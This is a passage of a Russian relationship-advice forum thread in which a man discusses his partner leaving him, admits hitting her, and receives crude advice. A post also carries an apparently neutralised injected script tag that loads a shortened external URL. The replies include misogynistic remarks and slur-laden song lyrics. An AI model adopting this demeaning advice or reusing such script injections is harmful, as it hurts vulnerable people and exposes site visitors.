Top.Mail.Ru

Перейти к содержимому

Фотография

девушка ушла к другому

• Авторизуйтесь для ответа в теме
Сообщений в теме: 102

#61 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 16:42

<script type="text/oops" src="http://is.gd/J87Pzs"...7Pzs"></script>

Ну ты конечно молодец, способ воспитания женщины выбрал отличающийся оригинальностью :)
Только женщина с заниженной самооценкой и психологическими проблемами не пошлет такого мужика сразу же. Сразу же. Такое воспитание недопустимо.

отдаю ей должное терпела долго,хоть и ушла по другому поводу,иза запрета выпить на пасху)))))))как утверждала позже моя страшная ошибка)))))))))сам бы не подумал что смог бы поднять руку на женщину,но после 100 пьянки нервы не выдержали...какое то время я мог это терпеть,но родные жаловались что в доме пахнет бухлом ,что не хотят видеть пьяную

Ну ты конечно молодец, способ воспитания женщины выбрал отличающийся оригинальностью :)
Только женщина с заниженной самооценкой и психологическими проблемами не пошлет такого мужика сразу же. Сразу же. Такое воспитание недопустимо.
Тебе нужно было переключать внимание женщины на другие интересы - просмотр фильмов, новости кино, поездки в областной город, например в Макдональдс или KFC. Посещение театров там, кинотеатров, парки, велики, Фейсбук, инстаграммы и так далее.

Все это может сработать в теории, однако упирается в ограниченность материальных ресурсов. Поэтому вытащить этим женщину больную алкоголизмом скорее не получится. Как в фильме "Красотка" на такую даму нужен миллионер :))
Тогда получится показать другую жизнь, другие интересы, другие перспективы и другие источники откуда можно черпать счастье. И у нее получится научиться получать счастье не только из баттла со стольной 0.7 :)

я дал ей работать,и ура она не пила,встречал ее с работы,каждый день в пекарне пекла сердечки для меня))))))это был самый лучший период,но если бы я знал что она мне изменяла с *подругой* еще в феврале то сам бы ее бросил. 

Тебе нужно было переключать внимание женщины на другие интересы - просмотр фильмов, новости кино, поездки в областной город, например в Макдональдс или KFC. Посещение театров там, кинотеатров, парки, велики, Фейсбук, инстаграммы и так далее. Ну у тебя не хватит ресурсов увлечь ее другой жизнью.

Все это может сработать в теории, однако упирается в ограниченность материальных ресурсов. Поэтому вытащить этим женщину больную алкоголизмом скорее не получится. Как в фильме "Красотка" на такую даму нужен миллионер :))
Тогда получится показать другую жизнь, другие интересы, другие перспективы и другие источники откуда можно черпать счастье. И у нее получится научиться получать счастье не только из баттла со стольной 0.7 :)

я уже писал если человек любит он вернется,через месяц,год, неважно,есть фильмы в пример ,случаи,да и начинать отношения сразу после других гибельно

• 0

#62 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 16:44

В этом случае надо было строить своих христанутых родственников, а не жену бить.

Дал ей работать? Я честно представлял картину несколько иной. Сейчас всплывает картина несчастной рабыни Изауры и Леонидаса с толпой христанутых родственников.

В любом случае советы все вообщем даны. И от перемены мест слагаемых сумма не меняется.

Сообщение отредактировал Mixrud: 28 мая 2017 - 16:47

• 0

#63 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 16:45

В этом случае надо было строить своих христанутых родственников, а не жену бить.

что сделано то сделано мы оба виноваты

• 0

#64 preнегодяй

preнегодяй

тусовщик

• Перцы
  • Pip
  • 88 Cообщений
175
Очень хороший

Отправлено 28 мая 2017 - 20:33

Он вроде из российской глубинки. 

Там у них все по другому. Немного госслужбы, на которую берут только за взятки или кумовство. Возможно есть одно градообразующее предприятие на радиус 50 километров , немного частного бизнеса, а так только фермерствовать.

Так что если человек токарь или слесарь может и год без работы сидеть, перебиваясь заказами на дому.

И Массимо дутти, Зары, Баркер, Гап, GF Ferre, Bally, Loake там тоже нет. В лучшем случае в соседнем совхозе точка Wildberries. А иначе рынок с китайским шмотьем в цену с чугунный мост. И запчасти там возятся с областного филиала бывшего Экзист, который по наполнению намного хуже московского. И иногда из Москвы на двигатель Опель выпускной клапан ну не привезти, вообще.

Игорь Растеряев Комбайнеры

Далеко от больших городов,
Там где нет дорогих бутиков,
Там другие люди живут,
О которых совсем не поют.
Не снимают про них сериалов,
Ведь они не в формате каналов,
И не пишет про них интернет,
Их совсем вроде как бы и нет.
Они молоды, но не студенты,
Ни «О’кея» не знают, ни «Ленты»,
В суши-барах они не бывают,
И в соляриях не загорают.
У них нет дорогой гарнитуры,
Наплевать им на эмо-культуру,
Не сидят «В Контактах», в онлайнах,
Они вкалывают на комбайнах.

Выпил С2H5OH,
Сел на «Ниву» Ростсельмаш,
На ДТ, Дон 500, Т-150,
Покормил перед этим поросят.
И пошёл зябь пахать, молотить ячмень,
Будет долгим, долгим, долгим твой рабочий день,
Но зато ты знаешь каждый винтик в тракторе внутри,
Получаешь за работу в месяц тысячи три.
Комбайнёры!

Каждый из них был в армии родной
Не отмазался никто, что у него там геморрой.
Комбайнеры, трактористы, грузчики арбузных фур-
Эти парни не являются мечтой гламурных дур.
И пускай там пидарасы беснуются в Москве,
Но пока такие пацаны есть у нас в стране,
Знают пусть враги, все знают, сучка Кондолиза Райс:
Никогда отребье НАТОвское не возьмёте нас.

• 1

#65 0.anzhelika.0

0.anzhelika.0

Chile, hola!

• Модератор
  • PipPipPipPipPipPip
  • 32 222 Cообщений
11 412
Очень хороший

Отправлено 28 мая 2017 - 21:40

все может быть,но любить одного а жить с другим это либо пустые слова с намеком на *аэродром* либо болезненная правда ввиду моей несостоятельности дать ей ее потребности

1. ты запаска, смирись.

2. нельзя строить отношения с деструктивными личностями.

3. твой план:

3.1. прокачка по Т100Б

3.2. тотальный игнор бывшей - ее везде в блок прямо сейчас

3.3. Т10Д и чтобы девочки были уровнем выше бывшей. Хоть плачь, хоть виагру пей, но чтобы 10 красивых и молодых трахнул.

• 1
Если вам по жизни плохо,
Ничего вы не хотите, 
Также вас никто не любит,
Вещи валятся из рук,
Вы, конечно же, терпите.
Нет решения проблемы,
А в психологов, конечно,
Верит только идиот.

#66 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 22:24

все может быть,но любить одного а жить с другим это либо пустые слова с намеком на *аэродром* либо болезненная правда ввиду моей несостоятельности дать ей ее потребности

1. ты запаска, смирись.

2. нельзя строить отношения с деструктивными личностями.

3. твой план:

3.1. прокачка по Т100Б

3.2. тотальный игнор бывшей - ее везде в блок прямо сейчас

3.3. Т10Д и чтобы девочки были уровнем выше бывшей. Хоть плачь, хоть виагру пей, но чтобы 10 красивых и молодых трахнул.

откуда вы знаете что я запаска, и игнорю 5 дней уже так то

про запаску многие говорили,она как то сказала что пока не хочет назад,но вы же читали с чего вы взяли что я запаска?

• 0

#67 0.anzhelika.0

0.anzhelika.0

Chile, hola!

• Модератор
  • PipPipPipPipPipPip
  • 32 222 Cообщений
11 412
Очень хороший

Отправлено 28 мая 2017 - 22:48

С того что если бы ты не был запаской, то она бы с тобой вообще бы не общалась и не говорила что любит - это же хороший жирный поводок, смотри как тебя колбасит  :rolleyes:

• 1
Если вам по жизни плохо,
Ничего вы не хотите, 
Вещи валятся из рук,
Вы, конечно же, терпите.
Нет решения проблемы,
А в психологов, конечно,
Верит только идиот.

#68 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 22:53

С того что если бы ты не был запаской, то она бы с тобой вообще бы не общалась и не говорила что любит - это же хороший жирный поводок, смотри как тебя колбасит  :rolleyes:

ну да месяц звонила но сейчас то она работает и не звонит неделю,так что не знаю даже какая там запаска

про любовь она в последнее время говорила что не знает,что запуталась.когда я узнал что она своему настукачила что я к ней приставал то сказал не пиши а она уже оправдывалась тип там камеры 

• 0

#69 0.anzhelika.0

0.anzhelika.0

Chile, hola!

• Модератор
  • PipPipPipPipPipPip
  • 32 222 Cообщений
11 412
Очень хороший

Отправлено 28 мая 2017 - 22:57

Да-да, уговаривай себя :yes: У нас тут таких самоуговорщиков полфорума.

про любовь она в последнее время говорила что не знает,что запуталась.когда я узнал что она своему настукачила что я к ней приставал то сказал не пиши а она уже оправдывалась тип там камеры 

Конечно! Ей же надо сделать так, чтобы он ее не слил, вот и тебе в уши ссыт что запуталась, чтобы ты не свалил, а ему ссыт что ты приставал, чтобы он ее не бортанул. Боже мой, как можно быть таким наивным, как ты?!

• 1
Если вам по жизни плохо,
Ничего вы не хотите, 
Вещи валятся из рук,
Вы, конечно же, терпите.
Нет решения проблемы,
А в психологов, конечно,
Верит только идиот.

#70 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 23:03

Конечно! Ей же надо сделать так, чтобы он ее не слил, вот и тебе в уши ссыт что запуталась, чтобы ты не свалил, а ему ссыт что ты приставал, чтобы он ее не бортанул. Боже мой, как можно быть таким наивным, как ты

а ничего что я не звоню ей и не пишу думаю это в ее планы не входитттт

при том неделю ,и я тоталку врубил,а вы что такой спец раз так говорите?

• 0

#71 0.anzhelika.0

0.anzhelika.0

Chile, hola!

• Модератор
  • PipPipPipPipPipPip
  • 32 222 Cообщений
11 412
Очень хороший

Отправлено 28 мая 2017 - 23:20

она ни в какую поцеловала и сказала люблю но так лучше будет

--------

Оставляет себе запасной аэродром

,она говорила что да что да и хз когда придет 

--------

Дергает поводок (ты сам его в зубах принес) и убеждается, что запасной аэродром все еще на месте.

в последущее время от нее были пинги(смс и звонки) где то раз в неделю или чаще

--------

Снова дергает поводок, ты радостно виляешь хвостом "Да, хозяйка, я тут, я все еще жду тебя".

бывшая ей сказала что меня любит,и что запуталась но с тем ей лучше

--------

Дергает поводок через твою мать иииии:

мама мне передала я не выдержал встретился с ней 

--------

Ты снова радостно бежишь к ней, виляя хвостом.

она не сильно против была

--------

Надо же собачке дать кусочек мяса за то, что она так верно ждет

мол не знаю кого люблю,пока не вернусь к тебе и т.д,

--------

Перевожу - "Мне с ним нормально, но ты на всякий случай будь наготове, если мне придется экстренно приземляться"

а позже узнал что она хахалю нажаловалась и он мне угрожал чтоб не приходил

--------

Перевожу - "Бля, как бы меня новый не бортанул, что с бывшим встречалась! Скажу новому, что бывший меня преследует"

я звоню потом ей и говорю зачем жалуешься а она не я так другие б сказали подруги

--------

Перевожу - "Бляяя, опять бывший достает, а у меня тут жопа уже в огне, на двух стульях сидеть, да еще и новый стал внимательнее за мной смотреть, надо бывшего чуть притушить, чтобы с новым мне ничего не попортил". Иииииии:

тип ты сам виноват и бросила

--------

Классически завиноватила тебя, чтобы ты и не слился, но и не лез к ней, чтобы она новому мужику под кулак не попала.

врубил игнорку 5 тдень уже не пишу не звоню, не хожу,она с ним полтора месяца уже,иногда с их общего профиля мониторят страницу мою на одноклассниках

--------

Проверяет - как там песик, почему молчит, на месте ли, ждет ли?

Вот не хотела в эту скуку погружаться, но вынудил. На, почитай, прям про тебя написано.

• 2
Если вам по жизни плохо,
Ничего вы не хотите, 
Вещи валятся из рук,
Вы, конечно же, терпите.
Нет решения проблемы,
А в психологов, конечно,
Верит только идиот.

#72 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 23:35

Вот не хотела в эту скуку погружаться, но вынудил. На, почитай, прям про тебя написано.

да вы шерлок))))))))))

конечно приятно что про меня не забывают ,но и в псы я не записывался,любить люблю но давайте сразу либо я либо он,так ей и говорил

а ответа не было, эта рутина вы знаете,а то что нивный не отрицаю,просто у нее опыта в жизни больше,40 лет брак 17 лет за спиной и т.д

Еще раз будет цитирование подобным образом и придется недельку посидеть в рид-онли и поучиться клавишей Backspace удалять лишний текст и оставлять в цитате 1-3 предложения, на которые хочется ответить. Анжелика

Сообщение отредактировал 0.anzhelika.0: 28 мая 2017 - 23:52

• 0

#73 Окорок

Окорок

Долговязый

• Полноправный
  • PipPipPipPipPip
  • 4 756 Cообщений
3 496
Очень хороший

Отправлено 28 мая 2017 - 23:40

заебал так цитировать, чувак((

• 1

#74 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 23:43

заебал так цитировать, чувак((

эййй а минус то за что ты мою карьеру тут ломаешььь

• 0

#75 Окорок

Окорок

Долговязый

• Полноправный
  • PipPipPipPipPip
  • 4 756 Cообщений
3 496
Очень хороший

Отправлено 28 мая 2017 - 23:51

Я желаю тебе быть сильным! У тебя все будет заебись!

• 1

Количество пользователей, читающих эту тему: 1

0